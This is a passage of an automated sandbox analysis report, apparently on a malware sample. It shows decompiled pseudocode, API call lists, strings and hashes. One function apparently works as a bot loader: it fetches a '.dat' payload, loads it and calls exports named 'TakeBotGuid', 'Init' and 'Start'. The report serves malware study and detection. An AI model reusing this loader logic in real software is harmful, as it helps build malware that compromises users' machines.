							}
							LeaveCriticalSection(0x12dd2e4);
						}
						return _v12;
					}
					_t213 =  &_v92;
					_t126 = E012C6886( &_v92, _t207, _a8, _a12);
					_v20 = _t126;
					if(_t126 != 0xffffffff) {
						_t214 = 0;
						__eflags = _v88;
						if(_v88 == 0) {
							L38:
							L012B114A( &_v92);
							_t129 = _v20 + _a12;
							__eflags = _t129;
							 *(_t203 + 8) = _t129;
							goto L39;
						}
						_t130 = L012B132A( &_v92);
						_v16 = _t130;
						__eflags = _t130 & 0x00000001;
						if((_t130 & 0x00000001) != 0) {
							L012B114A( &_v92);
							LeaveCriticalSection(0x12dd2e4);
							return  *0x12dd2e0(0xffffe8a3, 0) | 0xffffffff;
						}
						_v8 = _v8 & 0;
						_v12 = 0;
						__eflags = _t130 & 0x00000002;
						if((_t130 & 0x00000002) != 0) {
							_t214 = L012B142E(_a8, _a12);
							_v12 = _t214;
							__eflags = _t214;
							if(_t214 != 0) {
								L012B1A64( *((intOrPtr*)(_t203 + 0xc)),  *((intOrPtr*)(_t203 + 0x10)));
								L012B1933( *(_t203 + 0x14));
								L012B1933( *((intOrPtr*)(_t203 + 4)));
								_t146 = L012B12A8(_v84, _v80);
								 *(_t203 + 0x14) =  *(_t203 + 0x14) & 0x00000000;
								_t40 = _t203 + 0x18;
								 *_t40 =  *(_t203 + 0x18) & 0x00000000;
								__eflags =  *_t40;
								 *((intOrPtr*)(_t203 + 4)) = _t146;
								 *((intOrPtr*)(_t203 + 0xc)) = _v36;
								 *((intOrPtr*)(_t203 + 0x10)) = _v32;
								_v8 = L012B1177(_t214, L012B1177(_t214, L012B195B(_t214, _a12, "Accept-Encoding", "identity"), "TE"), "If-Modified-Since");
							} else {
								L012B1A64(_v36, _v32);
							}
						}
						__eflags = _v16 & 0x00000004;
						if((_v16 & 0x00000004) == 0) {
							L28:
							__eflags = _t214;
							if(_t214 == 0) {
								goto L38;
							}
							L012B114A( &_v92);
							_t69 = _t203 + 0x24;
							 *_t69 =  *(_t203 + 0x24) & 0x00000000;
							__eflags =  *_t69;
							 *(_t203 + 8) = _v20;
							 *((intOrPtr*)(_t203 + 0x20)) = _v8;
							 *(_t203 + 0x1c) = _t214;
							 *(_t203 + 0x28) = _a12;
							goto L30;
						}
						__eflags = _t214;
						if(__eflags != 0) {
							_t135 = _v8;
						} else {
							_t214 = _a8;
							_t135 = _a12;
						}
						_v16 = _t135;
						_v8 = E012C6B7C(_v16, __eflags, _t214, _v56, _v52,  &_v12);
						L012B1933(_v56);
						__eflags = _v8;
						if(_v8 != 0) {
							__eflags = _t214 - _a8;
							if(_t214 != _a8) {
								L012B1933(_t214);
							}
							_t214 = _v12;
						} else {
							__eflags = _t214 - _a8;
							if(_t214 == _a8) {
								goto L38;
							}
							_v8 = _v16;
						}
						goto L28;
					} else {
						E012C6467(_v16);
						L012B114A(_t213);
						goto L8;
					}
				}
			}

0x012c72e8
0x012c735e
0x00000000
0x012c72f6
0x012c72fc
0x012c7302
0x012c730a
0x012c730c
0x012c7312
0x012c7357
0x012c7358
0x00000000
0x012c7358
0x012c7317
0x012c7321
0x012c74d5
0x012c74d5
0x012c74e1
0x012c74e3
0x012c74eb
0x012c74ef
0x012c74f8
0x012c74fb
0x012c74fe
0x012c7501
0x012c7507
0x012c750c
0x012c750f
0x012c7525
0x012c752b
0x012c7531
0x012c7533
0x012c7551
0x012c7554
0x012c7554
0x012c7554
0x012c7557
0x012c7535
0x012c7538
0x012c7538
0x012c753b
0x012c7540
0x012c7547
0x012c754a
0x012c754a
0x012c7511
0x012c7511
0x012c751b
0x012c7522
0x012c755f
0x012c755f
0x00000000
0x012c7565
0x012c732b
0x012c757e
0x012c7585
0x012c758a
0x012c7591
0x012c759a
0x012c759d
0x012c75a0
0x012c75a3
0x012c75a9
0x012c75ae
0x012c75b1
0x012c75cc
0x012c75d2
0x012c75d5
0x012c75d8
0x012c75e2
0x012c75da
0x012c75dd
0x012c75dd
0x012c75b3
0x012c75b3
0x012c75bd
0x012c75c4
0x012c75e8
0x012c75e8
0x00000000
0x012c75ea
0x012c7338
0x012c733b
0x012c7340
0x012c7346
0x012c7375
0x012c7377
0x012c737a
0x012c756d
0x012c7570
0x012c7578
0x012c7578
0x012c757b
0x00000000
0x012c757b
0x012c7383
0x012c7388
0x012c738b
0x012c738d
0x012c7392
0x012c7398
0x00000000
0x012c73ac
0x012c73b1
0x012c73b4
0x012c73b7
0x012c73b9
0x012c73ca
0x012c73cc
0x012c73cf
0x012c73d1
0x012c73e6
0x012c73ee
0x012c73f6
0x012c7401
0x012c7409
0x012c740d
0x012c740d
0x012c740d
0x012c7411
0x012c7417
0x012c7429
0x012c744d
0x012c73d3
0x012c73d9
0x012c73d9
0x012c73d1
0x012c7450
0x012c7454
0x012c74ac
0x012c74ac
0x012c74ae
0x00000000
0x00000000
0x012c74b7
0x012c74bf
0x012c74bf
0x012c74bf
0x012c74c3
0x012c74c9
0x012c74cf
0x012c74d2
0x00000000
0x012c74d2
0x012c7456
0x012c7458
0x012c7462
0x012c745a
0x012c745a
0x012c745d
0x012c745d
0x012c7465
0x012c747e
0x012c7481
0x012c7486
0x012c748a
0x012c749d
0x012c74a0
0x012c74a4
0x012c74a4
0x012c74a9
0x012c748c
0x012c748c
0x012c748f
0x00000000
0x00000000
0x012c7498
0x012c7498
0x00000000
0x012c7348
0x012c734b
0x012c7352
0x00000000
0x012c7352
0x012c7346

APIs

EnterCriticalSection.KERNEL32(012DD2E4), ref: 012C72FC
LeaveCriticalSection.KERNEL32(012DD2E4), ref: 012C7358
LeaveCriticalSection.KERNEL32(012DD2E4), ref: 012C7398
LeaveCriticalSection.KERNEL32(012DD2E4), ref: 012C74E3
EnterCriticalSection.KERNEL32(012DD2E4), ref: 012C7501
LeaveCriticalSection.KERNEL32(012DD2E4), ref: 012C755F
LeaveCriticalSection.KERNEL32(012DD2E4), ref: 012C7585
EnterCriticalSection.KERNEL32(012DD2E4), ref: 012C75A3
LeaveCriticalSection.KERNEL32(012DD2E4), ref: 012C75E8

Strings

identity, xrefs: 012C741D
Accept-Encoding, xrefs: 012C7422
If-Modified-Since, xrefs: 012C743F

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: CriticalSection$Leave$Enter
String ID: Accept-Encoding$If-Modified-Since$identity
API String ID: 2978645861-3034467039
Opcode ID: b3afaa577a0c394e968bf8db978f65d885666a0e2710c67c14c65e1a1b56613d
Instruction ID: 8786180c4c6b8caf9902a44bffdd0173d49ec6042b7b709ec6b932e1d38ed43b
Opcode Fuzzy Hash: b3afaa577a0c394e968bf8db978f65d885666a0e2710c67c14c65e1a1b56613d
Instruction Fuzzy Hash: 32A1D671D2160AEFCF14DFA4E8859ADBB74FF14760F108619EA15A7390DB30AA51CF80

Uniqueness

Uniqueness Score: -1.00%

Function 012CEDF6 Relevance: 18.1, APIs: 12, Instructions: 75
filesynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012CEDF6(void** __esi, char _a4) {
				void* _t15;
				void* _t16;
				long _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				void* _t22;
				struct HDC__* _t23;
				void* _t24;
				void* _t25;
				void** _t41;

				_t41 = __esi;
				_t15 = __esi[7];
				if(_t15 != 0) {
					DeleteObject(_t15);
				}
				_t16 = _t41[3];
				if(_t16 != 0) {
					CloseHandle(_t16);
				}
				_t17 = _t41[1];
				if(_t17 != 0xffffffff) {
					TlsFree(_t17);
				}
				_t18 = _t41[5];
				if(_t18 != 0) {
					CloseHandle(_t18);
				}
				_t19 = _t41[4];
				if(_t19 != 0) {
					UnmapViewOfFile(_t19);
				}
				_t20 =  *_t41;
				if(_t20 != 0) {
					_t20 = CloseHandle(_t20);
				}
				if(_a4 != 0) {
					_t21 = _t41[0x56];
					if(_t21 != 0) {
						SelectObject(_t41[0x55], _t21);
					}
					_t22 = _t41[0x57];
					if(_t22 != 0) {
						DeleteObject(_t22);
					}
					_t23 = _t41[0x55];
					if(_t23 != 0) {
						DeleteDC(_t23);
					}
					_t24 = _t41[0x58];
					if(_t24 != 0) {
						CloseHandle(_t24);
					}
					_t25 = _t41[0x60];
					if(_t25 != 0 && WaitForSingleObject(_t25, 0) != 0x102) {
						PostThreadMessageW(_t41[0x62], 0x12, 0, 0);
					}
					_t14 =  &(_t41[0x5f]); // 0x12dd9b4
					return L012B11D1(_t14);
				}
				return _t20;
			}

0x012cedf6
0x012cedf6
0x012cee03
0x012cee06
0x012cee06
0x012cee08
0x012cee13
0x012cee16
0x012cee16
0x012cee18
0x012cee1e
0x012cee21
0x012cee21
0x012cee27
0x012cee2c
0x012cee2f
0x012cee2f
0x012cee31
0x012cee36
0x012cee39
0x012cee39
0x012cee3f
0x012cee43
0x012cee46
0x012cee46
0x012cee4d
0x012cee4f
0x012cee57
0x012cee60
0x012cee60
0x012cee66
0x012cee6e
0x012cee71
0x012cee71
0x012cee73
0x012cee7b
0x012cee7e
0x012cee7e
0x012cee84
0x012cee8c
0x012cee8f
0x012cee8f
0x012cee91
0x012cee99
0x012ceeb7
0x012ceeb7
0x012ceebd
0x00000000
0x012ceec3
0x012ceeca

APIs

DeleteObject.GDI32(?), ref: 012CEE06
CloseHandle.KERNEL32(?,?,?,012CF039,00000000,?,0000004C,00000000), ref: 012CEE16
TlsFree.KERNEL32(?,?,?,012CF039,00000000,?,0000004C,00000000), ref: 012CEE21
CloseHandle.KERNEL32(?,?,?,012CF039,00000000,?,0000004C,00000000), ref: 012CEE2F
UnmapViewOfFile.KERNEL32(?,?,?,012CF039,00000000,?,0000004C,00000000), ref: 012CEE39
CloseHandle.KERNEL32(?,?,?,012CF039,00000000,?,0000004C,00000000), ref: 012CEE46
SelectObject.GDI32(?,?), ref: 012CEE60
DeleteObject.GDI32(?), ref: 012CEE71
DeleteDC.GDI32(?), ref: 012CEE7E
CloseHandle.KERNEL32(?,?,?,012CF039,00000000), ref: 012CEE8F
WaitForSingleObject.KERNEL32(?,00000000,?,?,012CF039,00000000), ref: 012CEE9E
PostThreadMessageW.USER32 ref: 012CEEB7

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: CloseHandleObject$Delete$FileFreeMessagePostSelectSingleThreadUnmapViewWait
String ID:
API String ID: 1699860549-0
Opcode ID: e6213e4f11c971011d85ebc3ce02650baf9af4ded6c28750c40e63b73dc5d982
Instruction ID: 3671b664bb2d8d62dd099dfd25d19673032a496fd7c95c639c7ebf4e8defa503
Opcode Fuzzy Hash: e6213e4f11c971011d85ebc3ce02650baf9af4ded6c28750c40e63b73dc5d982
Instruction Fuzzy Hash: 7A21FA71610702ABEA309A79DC8CB97BBECAF54BA1F06491CE756D7190DB34E4408B24

Uniqueness

Uniqueness Score: -1.00%

Function 012CD4FF Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 273
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E012CD4FF(void* __ecx, signed int __edx, signed int _a4, long _a8, signed short _a12) {
				struct HWND__* _v8;
				char _v12;
				signed int _v16;
				struct HWND__* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed char _v36;
				intOrPtr _v72;
				struct tagWINDOWINFO _v96;
				void* __ebx;
				void* __esi;
				intOrPtr _t102;
				struct HWND__* _t103;
				signed int _t107;
				signed int _t108;
				struct HWND__* _t133;
				long _t136;
				struct HWND__* _t161;
				long _t162;
				void* _t165;

				_t165 = __ecx;
				_t102 =  *((intOrPtr*)(__ecx + 0x10));
				_t132 = __edx;
				_v16 = __edx;
				_v20 = 0;
				if( *((intOrPtr*)(_t102 + 0x110)) == 0) {
					_t103 =  *((intOrPtr*)(_t102 + 0x108));
					_v20 = _t103;
					if(_t103 != 0) {
						_v36 = L012B167C(_t103, __ecx, 0, 0) & 0x0000ffff;
					} else {
						_v36 = 0;
					}
				} else {
					if((__edx & 0x00000001) != 0) {
						E012CD071(_a8, _a4, __ecx);
						_t132 = __edx & 0xfffffffe;
						_v16 = _t132;
					}
					if((_t132 & 0x00000004) != 0) {
						E012CD002(0, _t165, 0, 0, 1);
						_t132 = _v16;
					}
				}
				 *( *(_t165 + 0x10) + 0x100) = _a4;
				_t107 =  *(_t165 + 0x10);
				 *((intOrPtr*)(_t107 + 0x104)) = _a8;
				if(_t132 == 0) {
					L68:
					return _t107;
				}
				_v24 = _t132;
				_t24 =  &_v24;
				 *_t24 = _v24 & 0x00000002;
				if( *_t24 == 0) {
					if((_t132 & 0x00000004) == 0) {
						goto L14;
					} else {
						_push(0);
						goto L13;
					}
				} else {
					_push(1);
					L13:
					_t107 = L012B167C(_t107, _t165, 1);
					L14:
					_v28 = _t132;
					_t29 =  &_v28;
					 *_t29 = _v28 & 0x00000020;
					if( *_t29 == 0) {
						if((_t132 & 0x00000040) == 0) {
							L19:
							_v32 = _t132;
							_t34 =  &_v32;
							 *_t34 = _v32 & 0x00000008;
							if( *_t34 == 0) {
								if((_t132 & 0x00000010) == 0) {
									L24:
									_t108 =  *(_t165 + 0x10);
									_push( *((intOrPtr*)(_t108 + 0x104)));
									_push( *((intOrPtr*)(_t108 + 0x100)));
									_t143 = 0x64;
									_t161 = L012B1889(_t143,  &_v12);
									_t107 = _v12 + 0xfffffff6;
									_v8 = _t161;
									if(_t107 <= 7) {
										_t107 = GetWindowLongW(_t161, 0xfffffff0);
										if((_t107 & 0x40000000) != 0) {
											_t143 = _t107;
											_t107 = L012B18BB(_t107);
											if(_t107 == 0) {
												_t107 = GetParent(_t161);
												if(_t107 != 0) {
													_v8 = _t107;
													_t161 = _t107;
												}
											}
										}
									}
									if(_t161 == 0) {
										L34:
										_t133 = _v20;
										if(_t133 != 0) {
											_t107 = IsWindow(_t133);
											if(_t107 == 0 || _t161 != 0 && _t133 != _t161 && (_v36 & 0x00000007) == 0) {
												if(_v16 != 0x8001) {
													_t107 = E012CD002(0, _t165, 0, 0, 1);
												}
											} else {
												_v8 = _t133;
												_v12 = 1;
												_t161 = _t133;
											}
										}
										goto L42;
									} else {
										_t143 = _t161;
										_t107 = L012B1956(_t161);
										if((_t107 & 0x00000040) == 0) {
											goto L34;
										}
										if(_t161 != _v20) {
											_t107 = E012CD002(_t161, _t165, GetWindowThreadProcessId(_t161, 0), 0, 1);
										}
										_v12 = 1;
										L42:
										if(_t161 == 0) {
											goto L68;
										}
										_v96.cbSize = 0x3c;
										_t107 = GetWindowInfo(_t161,  &_v96);
										if(_t107 == 0) {
											goto L68;
										}
										_t107 = _a4 & 0x0000ffff;
										_t136 = (_a8 & 0x0000ffff) << 0x00000010 | _t107;
										if(_v12 != 1) {
											_t162 = _a8;
										} else {
											_t143 = _t161;
											_t107 = L012B1956(_t161);
											if((_t107 & 0x00000020) == 0) {
												_t107 = _a4 - _v96.rcClient & 0x0000ffff;
												_t162 = (_a8 - _v72 & 0x0000ffff) << 0x00000010 | _t107;
											} else {
												_t162 = _t136;
											}
										}
										if(_v24 == 0) {
											if((_v16 & 0x00000004) == 0) {
												goto L54;
											}
											_push(_t136);
											_push(_t162);
											_push(0xa2);
											_push(0x202);
											goto L53;
										} else {
											_push(_t136);
											_push(_t162);
											_push(0xa1);
											_push(0x201);
											L53:
											_push(_v12);
											_push( &_v96);
											_push(_v8);
											_t107 = E012CD271(_t165, _t143);
											L54:
											if(_v28 == 0) {
												if((_v16 & 0x00000040) == 0) {
													L59:
													if(_v32 == 0) {
														if((_v16 & 0x00000010) == 0) {
															L64:
															if((_v16 & 0x00000001) != 0) {
																_t107 = E012CD271(_t165, _t143, _v8,  &_v96, _v12, 0x200, 0xa0, _t162, _t136);
															}
															if((_v16 & 0x00000800) == 0) {
																goto L68;
															} else {
																return PostMessageW(_v8, 0x20a, (_a12 & 0x0000ffff) << 0x00000010 | L012B167C(_t107, _t165, 0, 0) & 0x0000ffff, _t136);
															}
														}
														_push(_t136);
														_push(_t162);
														_push(0xa5);
														_push(0x205);
														L63:
														_push(_v12);
														_push( &_v96);
														_push(_v8);
														_t107 = E012CD271(_t165, _t143);
														goto L64;
													}
													_push(_t136);
													_push(_t162);
													_push(0xa4);
													_push(0x204);
													goto L63;
												}
												_push(_t136);
												_push(_t162);
												_push(0xa8);
												_push(0x208);
												L58:
												_push(_v12);
												_push( &_v96);
												_push(_v8);
												_t107 = E012CD271(_t165, _t143);
												goto L59;
											}
											_push(_t136);
											_push(_t162);
											_push(0xa7);
											_push(0x207);
											goto L58;
										}
									}
								}
								_push(0);
								L23:
								L012B167C(_t107, _t165, 2);
								goto L24;
							}
							_push(1);
							goto L23;
						}
						_push(0);
						L18:
						_t107 = L012B167C(_t107, _t165, 4);
						goto L19;
					}
					_push(1);
					goto L18;
				}
			}

0x012cd507
0x012cd509
0x012cd50f
0x012cd511
0x012cd514
0x012cd51e
0x012cd54d
0x012cd553
0x012cd558
0x012cd56a
0x012cd55a
0x012cd55a
0x012cd55a
0x012cd520
0x012cd523
0x012cd52d
0x012cd532
0x012cd535
0x012cd535
0x012cd53b
0x012cd543
0x012cd548
0x012cd548
0x012cd53b
0x012cd573
0x012cd579
0x012cd57f
0x012cd587
0x012cd808
0x012cd808
0x012cd808
0x012cd58d
0x012cd590
0x012cd590
0x012cd594
0x012cd59d
0x00000000
0x012cd59f
0x012cd59f
0x00000000
0x012cd59f
0x012cd596
0x012cd596
0x012cd5a0
0x012cd5a4
0x012cd5a9
0x012cd5a9
0x012cd5ac
0x012cd5ac
0x012cd5b0
0x012cd5b9
0x012cd5c5
0x012cd5c5
0x012cd5c8
0x012cd5c8
0x012cd5cc
0x012cd5d5
0x012cd5e1
0x012cd5e1
0x012cd5e4
0x012cd5ed
0x012cd5f5
0x012cd5fb
0x012cd600
0x012cd603
0x012cd609
0x012cd60e
0x012cd619
0x012cd61b
0x012cd61d
0x012cd624
0x012cd627
0x012cd62f
0x012cd631
0x012cd634
0x012cd634
0x012cd62f
0x012cd624
0x012cd619
0x012cd638
0x012cd668
0x012cd668
0x012cd66d
0x012cd670
0x012cd678
0x012cd69d
0x012cd6a7
0x012cd6a7
0x012cd688
0x012cd688
0x012cd68b
0x012cd692
0x012cd692
0x012cd678
0x00000000
0x012cd63a
0x012cd63a
0x012cd63c
0x012cd643
0x00000000
0x00000000
0x012cd648
0x012cd65a
0x012cd65a
0x012cd65f
0x012cd6ac
0x012cd6ae
0x00000000
0x00000000
0x012cd6b9
0x012cd6c0
0x012cd6c8
0x00000000
0x00000000
0x012cd6d2
0x012cd6d9
0x012cd6df
0x012cd709
0x012cd6e1
0x012cd6e1
0x012cd6e3
0x012cd6ea
0x012cd702
0x012cd705
0x012cd6ec
0x012cd6ec
0x012cd6ec
0x012cd6ea
0x012cd710
0x012cd724
0x00000000
0x00000000
0x012cd726
0x012cd727
0x012cd728
0x012cd72d
0x00000000
0x012cd712
0x012cd712
0x012cd713
0x012cd714
0x012cd719
0x012cd732
0x012cd732
0x012cd738
0x012cd739
0x012cd73e
0x012cd743
0x012cd747
0x012cd75b
0x012cd77a
0x012cd77e
0x012cd792
0x012cd7b1
0x012cd7b5
0x012cd7cf
0x012cd7cf
0x012cd7db
0x00000000
0x012cd7dd
0x00000000
0x012cd7fe
0x012cd7db
0x012cd794
0x012cd795
0x012cd796
0x012cd79b
0x012cd7a0
0x012cd7a0
0x012cd7a6
0x012cd7a7
0x012cd7ac
0x00000000
0x012cd7ac
0x012cd780
0x012cd781
0x012cd782
0x012cd787
0x00000000
0x012cd787
0x012cd75d
0x012cd75e
0x012cd75f
0x012cd764
0x012cd769
0x012cd769
0x012cd76f
0x012cd770
0x012cd775
0x00000000
0x012cd775
0x012cd749
0x012cd74a
0x012cd74b
0x012cd750
0x00000000
0x012cd750
0x012cd710
0x012cd638
0x012cd5d7
0x012cd5d8
0x012cd5dc
0x00000000
0x012cd5dc
0x012cd5ce
0x00000000
0x012cd5ce
0x012cd5bb
0x012cd5bc
0x012cd5c0
0x00000000
0x012cd5c0
0x012cd5b2
0x00000000
0x012cd5b2

APIs

GetWindowLongW.USER32(00000000,000000F0), ref: 012CD60E
GetParent.USER32(00000000), ref: 012CD627
GetWindowThreadProcessId.USER32(?,00000000), ref: 012CD64D
IsWindow.USER32(?), ref: 012CD670

Part of subcall function 012CD071: WaitForSingleObject.KERNEL32(?,000000FF), ref: 012CD085
Part of subcall function 012CD071: ReleaseMutex.KERNEL32(?), ref: 012CD0A4
Part of subcall function 012CD071: GetWindowRect.USER32 ref: 012CD0B1
Part of subcall function 012CD071: IsRectEmpty.USER32(?), ref: 012CD135
Part of subcall function 012CD071: GetWindowLongW.USER32(?,000000F0), ref: 012CD144
Part of subcall function 012CD071: GetParent.USER32(?), ref: 012CD15A
Part of subcall function 012CD071: MapWindowPoints.USER32 ref: 012CD163
Part of subcall function 012CD071: SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 012CD187

GetWindowInfo.USER32 ref: 012CD6C0
PostMessageW.USER32(?,0000020A,?,?), ref: 012CD7FE

Part of subcall function 012CD002: WaitForSingleObject.KERNEL32(?,000000FF,762EA660,012CD43B,00000000), ref: 012CD008
Part of subcall function 012CD002: ReleaseMutex.KERNEL32(?), ref: 012CD03C
Part of subcall function 012CD002: IsWindow.USER32(?), ref: 012CD043
Part of subcall function 012CD002: PostMessageW.USER32(?,00000215,00000000,?), ref: 012CD05D

Strings

, xrefs: 012CD5AC
@, xrefs: 012CD757
<, xrefs: 012CD6B9

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: Window$LongMessageMutexObjectParentPostRectReleaseSingleWait$EmptyInfoPointsProcessThread
String ID: $<$@
API String ID: 3705211839-2197183666
Opcode ID: a6757ed227a503d2388feffc6c97ba1c41017f838f2cb741567fbc5d092424e4
Instruction ID: b680e76f5effa5d2ddcdad308ab9fdea5440e69231fc2424c38041b20632f788
Opcode Fuzzy Hash: a6757ed227a503d2388feffc6c97ba1c41017f838f2cb741567fbc5d092424e4
Instruction Fuzzy Hash: 7A91F470A2030EAFEB219ED8D889FBE7BB5AF50F44F14422DEB14661D0C7B49945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012C1AC1 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 146
libraryloaderthreadCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E012C1AC1(intOrPtr __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* _t43;
				struct HINSTANCE__* _t45;
				_Unknown_base(*)()* _t48;
				intOrPtr _t64;
				void* _t107;
				WCHAR* _t120;
				intOrPtr _t123;
				void* _t124;
				void* _t126;
				intOrPtr* _t127;
				struct HINSTANCE__* _t130;
				struct HINSTANCE__* _t133;

				_t124 = _t126 - 0x78;
				_t127 = _t126 - 0x270;
				 *((intOrPtr*)(_t124 + 0x6c)) = __ecx;
				L012B1721(0, _t124 + 0x60);
				L012B164F(_t124 - 0x10, 0x12d76a4, 2);
				L012B101E(_t124 - 0x10, 2);
				L012B101E(_t124 - 0x10, 8);
				_t130 =  *0x12dc758; // 0x0
				if(_t130 == 0) {
					_t120 = L012B175D(0xff);
					 *(_t124 + 0x70) = _t120;
					L012B15E6(1, _t120);
					_t107 = 0x5c;
					 *((short*)(L012B1ABE(_t120, _t107) + 2)) = 0;
					_t43 = L012B18B6(_t124 - 0x10);
					_t108 = _t124 - 0x10;
					L012B101E(_t120, _t43);
					_t45 = LoadLibraryW(_t120);
					 *0x12dc758 = _t45;
					_t131 = _t45;
					if(_t45 != 0) {
						L5:
						L012B11AE(_t124 - 0x1f8);
						 *(_t124 + 0x74) = L012B1195(_t124 - 0x1f4, _t108 | 0xffffffff);
						_t48 = GetProcAddress( *0x12dc758, "TakeBotGuid");
						 *0x12dc780 = _t48;
						 *_t48();
						 *_t127 = "Init";
						 *0x12dc76c = GetProcAddress( *0x12dc758,  *(_t124 + 0x74));
						 *0x12dc794 = GetProcAddress( *0x12dc758, "Start");
						 *0x12dc7ac = 0;
						 *0x12dc7a8 = L012B175D(0xff);
						L012B1A19(_t52,  *((intOrPtr*)(_t124 + 0x6c)), 0xffffffff);
						CreateThread(0, 0, E012C0F66, 0, 0, 0);
					} else {
						 *(_t124 + 0x64) = L012B175D(0x30d40);
						_t123 = L012B175D(0xff);
						L012B1A19(_t123,  *((intOrPtr*)(_t124 + 0x6c)), 0xffffffff);
						 *((char*)(L012B161D(_t123, 0x2f) + 1)) = 0;
						L012B1951(_t123, 2);
						 *(_t124 + 0x74) = L012B1195(_t124 - 0x10, "l/" | 0xffffffff);
						L012B1951(_t123, L012B1BE0(_t60));
						L012B12A3(_t124 + 0x30, _t131);
						_t64 =  *0x12dcc54; // 0x0
						_t108 = _t124 + 0x64;
						 *((intOrPtr*)(_t124 + 0x38)) = _t64;
						 *((intOrPtr*)(_t124 + 0x40)) = _t123;
						 *((intOrPtr*)(_t124 + 0x58)) = 0x12d000;
						if(L012B1690(0, _t124 + 0x30, _t124 + 0x64, 0xff) != 0) {
							_t108 =  *(_t124 + 0x64);
							L012B14A1( *(_t124 + 0x70),  *(_t124 + 0x64),  *((intOrPtr*)(_t124 + 0x68)));
							 *0x12dc758 = LoadLibraryW( *(_t124 + 0x70));
						}
						L012B1933( *(_t124 + 0x64));
						L012B1933( *(_t124 + 0x70));
						_t133 =  *0x12dc758; // 0x0
						if(_t133 != 0) {
							goto L5;
						}
					}
				}
				return 0;
			}

0x012c1ac2
0x012c1ac6
0x012c1acc
0x012c1ad5
0x012c1ae4
0x012c1af1
0x012c1b00
0x012c1b07
0x012c1b0d
0x012c1b21
0x012c1b28
0x012c1b2b
0x012c1b32
0x012c1b3c
0x012c1b43
0x012c1b49
0x012c1b4e
0x012c1b54
0x012c1b5a
0x012c1b5f
0x012c1b61
0x012c1c24
0x012c1c2a
0x012c1c4e
0x012c1c51
0x012c1c56
0x012c1c5b
0x012c1c5d
0x012c1c77
0x012c1c80
0x012c1c85
0x012c1c97
0x012c1c9c
0x012c1cab
0x012c1b67
0x012c1b73
0x012c1b7e
0x012c1b84
0x012c1b9b
0x012c1b9e
0x012c1bb0
0x012c1bbe
0x012c1bc6
0x012c1bcb
0x012c1bd0
0x012c1bd6
0x012c1bd9
0x012c1bdc
0x012c1bea
0x012c1bef
0x012c1bf5
0x012c1c03
0x012c1c03
0x012c1c0b
0x012c1c13
0x012c1c18
0x012c1c1e
0x00000000
0x00000000
0x012c1c1e
0x012c1cb2
0x012c1cba

APIs

LoadLibraryW.KERNEL32(00000000,00000000,?,?,00000008,00000002,00000002), ref: 012C1B54
LoadLibraryW.KERNEL32(?,?,00000000,00000002,000000FF,?,?,00000008,00000002,00000002), ref: 012C1BFD
GetProcAddress.KERNEL32(TakeBotGuid), ref: 012C1C51
GetProcAddress.KERNEL32 ref: 012C1C6A
GetProcAddress.KERNEL32(Start), ref: 012C1C7C
CreateThread.KERNEL32 ref: 012C1CAB

Strings

TakeBotGuid, xrefs: 012C1C43
.dat, xrefs: 012C1AF8
Start, xrefs: 012C1C6C

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

